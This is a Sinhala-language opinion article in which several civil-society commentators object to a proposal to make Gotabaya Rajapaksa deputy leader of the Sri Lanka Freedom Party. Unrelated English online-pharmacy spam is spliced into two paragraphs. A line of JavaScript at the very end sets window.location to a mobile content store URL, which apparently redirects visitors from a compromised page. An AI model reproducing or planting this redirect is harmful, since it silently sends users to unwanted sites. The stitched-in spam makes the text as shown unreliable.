ගෝඨා ශ‍්‍රීලනිපයට ගත යුතුද?

නිමල් අබේසිංහ

ගෝඨාභය රාජපක්ෂ යනු මහින්ද රාජපක්ෂ ආණ්ඩුවේ හිටපු ආරක්ෂක ලේකම්වරයාය. මහින්ද ආණ්ඩුවේ හිටපු නිලලත් හා නොලත් ප‍්‍රබල බලධාරියකු ලෙසද ඔහු කැපී පෙනුණේය. රාජපක්‍ෂ මර්දන යාන්ත‍්‍රණයේ බලලත් නායකයා වූ ඔහු මාධ්‍යකරුවන්ට එරෙහිව ප‍්‍රසිද්ධියේ කටයුතු කළ, මාධ්‍යවේදීන්ට හා දේශපාලන විරුද්ධවාදීන්ට පහරදීම් හා ඔවුන් පැහැරගෙන යෑම් අතුරුදන් කිරීම් හා ඝාතනය කිරීම් පිටුපස සිටි බවටද චෝදනා එල්ලවූවෙකි.

ගෝඨාභය රාජපක්ෂ ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ නියෝජ්‍ය නායක ධුරයට පත් කළ යුතුයැ’යි අමාත්‍ය ජෝන් සෙනෙවිරත්න පසුගිය දිනෙක කලවානේදී ප‍්‍රසිද්ධ ප‍්‍රකාශයක් කර තිබුණේය. මේ ඒ සම්බන්ධයෙන් සිවිල් සමාජ ක‍්‍රියාකාරිකයන් කීපදෙනකු දැක්වූ අදහස් ය.

සිවිල් සමාජය විරුද්ධ විය යුතුයි | ජෝශප් ස්ටාලින්
ලංකා ගුරු සංගමයේ ලේකම්

ජනවාරි අටවෙනිදා මේ රටේ ජනතාව බලාපොරොත්තු වුණේ මහින්ද රාජපක්ෂ පමණක් පරාජය කිරීමට නොවෙයි. මේ රටේ පැවතුණු මහින්ද රාජපක්ෂ සංස්කෘතියම පරාජය කිරීමටයි. ඒ සංස්කෘතියේ ජන පීඩක මර්දන ක‍්‍රියාවලිය ක‍්‍රියාත්මක කළ ප‍්‍රධානියා තමයි ගෝඨාභය රාජපක්ෂ කියන්නේ. සම්පත් කොල්ලකමින් ආර්ථිකය විනාශ කළ පුද්ගලයා තමයි බැසිල් රාජපක්ෂ. මේ රටේ ප‍්‍රජාතන්ත‍්‍රවාදය විනාශකිරීමේ මෙහෙයුම්කරු ගෝඨාභයයි. මේ රටේ පහරදීමට ලක්වූ මරා දැමීමට ලක්වූ මාධ්‍යවේදීන්, පහරදෙන ලද මාධ්‍ය ආයතන ගැන කතා කළොත් ඒ පිටුපස සිටින්නේ ඔහු විසින් මෙහෙයවන ලද ත‍්‍රිවිධ හමුදාවේ පිරිසුයි. ඔහුට ආරක්ෂක ලේකම්ටත් එහා ගිය බලතල තිබුණා. කොටින්ම ආණ්ඩුක‍්‍රම ව්‍යවස්ථාවේ බලධුරාවලියේ නොමැති බලයක් ඔහු විසින් අත්පත් කරගෙන තිබුණා. එවැනි පුද්ගලයකු ගැන ජනවාරි අටවෙනිදා ක‍්‍රියාවලියෙන් පසුව ජනතාව විසින් පත්කරන ලද රජය තුළ ඉඳගෙන මෙවැනි ප‍්‍රකාශ කිරීමෙන් පෙන්නුම් කරන්නේ ඒ ආණ්ඩුව පත් කළ ජනතාවට කොකා පෙන්නීමක්.

buy lamisil thailand: medications related to cheap lamisil tablets online in thailand.

ඒ වාගේම එසේ කරන ලද ප‍්‍රකාශයෙන් පසුව ගෝඨාගේ ප‍්‍රතිචාරය වන්නේ ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ නියෝජ්‍ය නායක තනතුර නොවෙයි ඊටත් එහා තිබෙන තනතුරකට වුවත් තමන් සුදුසුයි යන්නයි. නව ව්‍යවස්ථාව තුළ මහින්දට නැවත ජනාධිපති තනතුරට තරග කරන්නට නොහැකියි, ඒ නිසා ජනාධිපති තනතුර සඳහා තරග කරන්න තමන්ට හැකියාවක් තිබෙන බවයි ඔහු කියන්නේ.

මට පුළුවන් කියන්නේ, තමන්ට හැකියාවක් තියෙනවා කියන තරම් හයියක් මෙයින් ඔහුට ලැබිලා තියෙනවා.
රාජ්‍ය ආරක්ෂක අමාත්‍යාංශයෙන් බැහැරව පිළිගත් නීතිරීතිවලට පටහැනිව ඇවන්ගාඞ් සමාගම වැනි සමාගම්වලට ආයුධ ලබාදීම, රක්නා ලංකා සමාගම පෞද්ගලික සමාගමක් ලෙස පවත්වාගෙන යෑම වැනි චෝදනාවලට රජය විසින් නිසි පියවර නොගැනීම තුළින් ඔහුව හුරතල් කිරීම හරහා ඔහුට මෙබඳු ප‍්‍රකාශ කරන්නට අවස්ථාව ලබාදීම ගැන ආණ්ඩුව වගකිවයුතුයි. නීත්‍යනුකූල මර්දන, ආරක්ෂක මධ්‍යස්ථාන පවත්වාගෙන ගිය චූදිතයකුට මෙසේ සෙල්ලම් කරන්නට ආණ්ඩුවට ඉඩදීමට එරෙහිව සිවිල් සමාජය කටයුතු කළ යුතු බවයි මට කියන්න තියෙන්නේ.

 

ගෝඨා වියරුකමින් ඉහවහා ගිය කෙනෙක්
order disulfiram online for treating chronic alcoholism. … if the question ?here can i order methotrexate??made you visit our online pharmacy, … ආචාර්ය ලියනගේ අමරකීර්ති

ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ ඉතිහාසය සාමාන්‍යයෙන් තිබුණේ සිංහල මධ්‍යස්ථ මතධාරීන්ගේ පක්ෂයක් විදියටයි. ගුරුවරුන්, සාමාන්‍ය රජයේ සේවකයන් ජාතිකවාදීන් හෝ අන්තවාදීන් නොවෙයි. ඒ අයට යම් යම් හර පද්ධතීන් තිබුණා. විනයක් තිබුණා. ගෝඨාභය වගේ මිනිස්සු ඒ සම්ප‍්‍රදායට විරුද්ධ මිනිස්සු ජාතියක්. බීබීසී එකට, පුවත්පත්වලට දුන්න සම්මුඛ සාකච්ඡුාවලදී, ටෙලිවිෂන් එකේදී එයා හැසිරුණු විදිය හරියට උඩඟු රජ කෙනෙක් වගේ. දත්මිටි කාගෙන රවාගෙන හරිම අහංකාර විදියටයි. ඉතින් මේ වගේ කෙනෙකුට ශ‍්‍රීලනිපයේ නියෝජ්‍ය නායකකමක් දෙනවා කියන්නේ ජනවාරි අට පාවාදීමක්. ජනවාරි අට පටන් ගත්ත ගමන ඉදිරියට ගෙනයෑමේදී සිදුවෙන විශාල හානියක්.

ඉතාම අමාරුවෙන් හරි නීතියේ ආධිපත්‍යය සහිතව යම්කිසි විනිවිදභාවයක් කරා රට ගෙනියන්න අපට අවශ්‍යයි. එවැනිි මාවතකට යෑමේදී මේ වාගෙ චරිත හානිකරයි. ඕනෑ නම් ඒ අය වෙනම පක්ෂයක් හදාගෙන ආවාට කමක් නෑ. චණ්ඩි, ජාතිවාදියො, චණ්ඩි භික්ෂූන්, අලි හොරු ඒ වාගේ අය අරගෙන පක්ෂය ගෙනියන්න පුළුවන්. ඒ අයට වෙන්වෙන්න ඉඩදීලා ශ‍්‍රී ලංකා නිදහස් පක්ෂය මධ්‍යස්ථ ශ‍්‍රී ලාංකික දේශපාලන සංස්කෘතිය ඉදිරියට ගෙන යන එක හොඳයි. ශ‍්‍රීලනිපය කියද්දී පාතාල දාමරිකයො අපේ ඔළුවට එන්නේ නෑ. එහෙත් ගෝඨාභය කියද්දී අපේ ඔළුවට එන්නේ චණ්ඩි මල්ලිලා, වම්බොට්ටලා වගේ පිරිසක්. මේ වාගේ අය ගන්නවාද නැද්ද යන්න පක්ෂය විසින් තීරණය කළ යුතු දෙයක්. එහෙත් මේ වාගේ අය ගන්නවා නම් අපට අහන්න තිබෙන්නේ යහපාලන පරමාදර්ශය ගැන ඒ අයට කැපවීම මොකද්ද කියලායි. අපිට හොඳට තේරෙනවා මහින්දටත් වඩා චණ්ඩි කතා කියන්නේ ගෝඨාභයනෙ කියන එක. ගෝඨා වියරුකමින් ඉහවහා ගිය කෙනෙක්. ඉතින් අපි අලූත් රටක් සොයා යන ගමනේදී කා එක්කද යා යුත්තේ කියා තීරණය කළ යුතුයි.

 

අමුතුවෙන් විග‍්‍රහයක් අවශ්‍ය නෑ
ආචාර්ය නිර්මාල් රංජිත් දේවසිරි

පළමුවෙන්ම කියන්න තිබෙන දේ තමයි ගෝඨාභය ගන්නවාද නැත්ද කියන එක ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ හා එහි සාමාජිකයන් සතු ප‍්‍රශ්නයක් කියන එකයි. එහෙත් මට ගෝඨාභයගේ දේශපාලන චර්යාව ගැන විවේචනයක් තිබෙනවා. ඒ වාගේම මේ අය යම්කිසි විදියකට ආණ්ඩුවේ බලය අතට ගන්න ආවොත් අපට ඉදිරියට ඇවිත් එයට කිසියම් ප‍්‍රතිචාරයක් දක්වන්න සිද්ධ වෙනවා. මට වැදගත් වන්නේ ගෝඨාභය කළේ මොනවාද යන්නයි.

කොහොම වුණත් ජෝන් සෙනෙවිරත්නගේ කතාවෙන් පැහැදිලි වෙන්නේ ඒගොල්ලන්ට අවශ්‍ය වෙන්නේ තනියම ආණ්ඩුවක් පිහිටුවා ගන්නයි. මහින්දගේ කඳවුරේ සිටින විමල් වීරවංශ, උදය ගම්මන්පිල වාගේ අය නිසා දෙමළ මුස්ලිම් ඡුන්ද ඒ අයට හදාගන්න විදියක් නැහැ. ජෝන් වගේ අය මේක හොඳට දන්නවා. ඉතින් ඒ අය හිතනවා ගෝඨාභය මහින්දටත් වඩා ජනප‍්‍රියයි. ඔහු තමා ඉදිරියට ගේන්න ඕනෑ කියන එක. හැබැයි එතැනදීත් ගෝඨාභය ගැන පොඩි ප‍්‍රශ්නයක් තියෙනවා.

ගෝඨාභයගේ ආගමනය තුළ අයහපත් දේවලූත් තියනවා. අපට ඒක හොඳට පේනවා. මහ දවල් ඉර පායනවා වාගේ හොඳට පෙනෙන දෙයක් ගැන මොනවටද අමුතුවෙන් විග‍්‍රහ කරන්නේ. ගෝඨාභය ශ‍්‍රීලනිපයට ගන්නවාද නැද්ද කියනවාට වඩා මේ වෙලාවේ ආණ්ඩුවේ පාර්ශ්වයෙන් ජනතාව සමග ඇතිකර ගත්ත සම්මුතීන් ඒවා තිබූ විදියටම ක‍්‍රියාත්මක වෙනවාද කියන ප‍්‍රශ්නය මට අහන්න සිද්ධ වෙනවා.

 

ඉන් පෙනෙන්නේ වත්මන් නායකත්වය දුර්වල බවයි
ජයතිලක කම්මැල්ලවීර

ගෝඨාභය ශ‍්‍රී ලංකා නිදහස් පක්ෂයට ගන්න යන්නේ මොකටද? එහෙම යෝජනා කරන අය කියන්නේ ශ‍්‍රී ලංකා එක ශක්තිමත් කරලා ශ‍්‍රී ලංකා ආණ්ඩුවක් හදන්න කියලායි. එක පැත්තකින් එහෙම යෝජනා කරන අය දැන් තේරුම් අරන් තියෙනවා මහින්දගේ කාලේ ඉවරයි කියලා. ඒ වුණත් ඒගොල්ලන්ට නැගිටින්න රාජපක්ෂ කෙනෙක් නැතුව බෑ. මොකද තවමත් තිබෙන්නේ පරණ ශ‍්‍රී ලංකා නිදහස් පක්ෂය නොවෙයි, රාජ-පක්ෂ පක්ෂය බව නේ රටට පෙනෙන්නේ. ඒක හොඳයි අපට හිනාවෙන්න. එහෙත් මෙතැන තිබෙනවා එහෙම හිනාවෙලා ඉවත දාන්න බැරි කාරණයක්. ඒක තමයි ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ ආණ්ඩුවක් හැදීමේ වුවමනාව තිබෙන්නේ කාටද කියන කාරණාව. මට හොඳට මතකයි ජාතික ආණ්ඩුව කියලා හඳුන්වපු මේ ආණ්ඩුව හදන්නත් කලින් දින සීයේ වැඩසටහන කාලේම ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ ආණ්ඩුවක් හැදීම ගැන ඉස්සරින්ම කතා කළේ ජනාධිපති මෛත‍්‍රීපාල සිරිසේන. ජාතික ආණ්ඩුව කියලා හඳුන්වපු එක හදනකොට ඒකට මහින්දවාදීන් රොත්තක් ඇමතිකම් දීලා ඇතුළු කරගත්තේත් ජනාධිපතිතුමාමයි. එහෙම කරන ගමන් ජනාධිපතිතුමා ශ‍්‍රී ලංකා ආණ්ඩුවක් හැදීම ගැන කතා කරන්න පටන් ගත්තා. දැන් ජනාධිපතිවරයා විසින් ආණ්ඩුවට ඇතුළු කරගත් මහින්දවාදීන් තමයි ගෝඨාභය ගෙනෙන්න කතා කරන්නේ. ඒගොල්ලෝ කියන විදියට පක්ෂය ශක්තිමත් කරලා ශ‍්‍රී ලංකා ආණ්ඩුවක් හදන්න ගෝඨාභය ඕනෑ. එහෙම නම් මේ ව්‍යාපෘතියේ මූලිකයා වෙන්නේ ජනාධිපතිවරයාම නේද? ඉස්සර කරපු දූෂණ වංචා අපරාධ ඉතා පැහැදිලිව පෙනෙද්දී පක්ෂය හැටියටවත් ඒ අයට විරුද්ධව පියවර නොගැනීමත් මේ ව්‍යාපෘතියේම කොටසක්ද කියලා ජනතාව තුළ සැකයක් ඇතිවෙනවා නම් ඒක සාධාරණයි. තමන් ජනාධිපතිවරණයෙන් පැරදුණා නම් තමන්ට පමණක් නොවෙයි පවුලේ අයටත් ඉන්න වෙන්නේ අඩි හයක් යට කියපු කතා දැන් පේන විදියට නිකම් සංදර්ශන කතාද කියලා අපට සැකයක් ඇතිවෙනවා.

තවත් කාරණයක් මෙතැනදී මතුවෙනවා. ගෝඨාභය පක්ෂ නායකත්වයට ගන්න ඕනෑ කියන එකේ තේරුම දැන් ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ නායකත්වය දුර්වලයි කියන එකනේ. ඒ නායකත්වය පිළිගන්න බෑ කියන එකනේ. ඒ වාගේම මෛත‍්‍රී දුර්වලයි, පිළිගන්න බෑ කියන එකයි. ඒක ඔප්පු කරන්න ඕනෑ නම් ජනාධිපතිවරයාටත් කරන්න තිබෙන්නේ ගෝඨාභය පක්ෂ නායකත්වයට ගන්න එකඟ වෙන එක විතරයි. එහෙම නැත්නම් තමන් ශක්තිමත් බව ඔප්පු කරමින් මේ යෝජනා ගෙනෙන අයට විරුද්ධව පියවර ගන්න ඕනෑ. කොහොම වුණත් ජනාධිපතිවරයා ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ නායකත්වය භාරගත්තු දා ඉඳලා මේ වෙනකල් සිද්ධවෙලා තිබෙන්නේ ඓතිහාසික පියවරක් කියලා එහෙම හදපු ජාතික ආණ්ඩුවට ඉස්සරහට යන්න බැරිවෙන තිරිංගයක් හැටියට මේ සාධකය ක‍්‍රියාකරන එකයි.

 window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;